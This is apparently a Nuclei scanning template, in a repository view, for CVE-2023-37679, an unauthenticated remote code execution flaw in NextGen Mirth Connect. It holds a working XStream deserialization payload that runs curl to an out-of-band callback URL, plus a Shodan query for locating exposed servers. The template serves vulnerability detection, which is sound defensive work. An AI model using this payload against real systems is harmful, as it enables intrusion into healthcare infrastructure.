nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

76 lines
2.4 KiB
YAML
Raw Normal View History

id: CVE-2023-37679
2023-10-25 18:13:45 +00:00
info:
2023-10-25 18:13:45 +00:00
name: NextGen Mirth Connect - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference:
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
- http://mirth.com
- http://nextgen.com
2023-10-25 18:13:45 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37679
cwe-id: CWE-77
epss-score: 0.00283
epss-percentile: 0.65055
cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
2023-10-25 18:13:45 +00:00
metadata:
verified: true
max-request: 2
vendor: nextgen
product: mirth_connect
2023-10-25 18:13:45 +00:00
shodan-query: title:"mirth connect administrator"
tags: cve,cve2023,nextgen,rce
http:
- raw:
- |
GET /api/server/version HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
- |
POST /api/users HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>curl</string>
<string>http://{{interactsh-url}}/</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
2023-10-25 18:13:45 +00:00
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition: and
extractors:
- type: regex
part: body_1
2023-10-25 18:13:45 +00:00
name: version
group: 1
regex:
- '(.*)'
2023-10-25 18:13:45 +00:00
internal: true
# digest: 4a0a004730450220639cf71c4a575fff6a9fed4cb3518fe8de8e77e7de1eeacab5cc6d256114c9c702210095b24e93bd2eed536233ec927f799c62afb4fb30aa15cc850ff1e2faff32290e:922c64590222798bb761d5b6d8e72950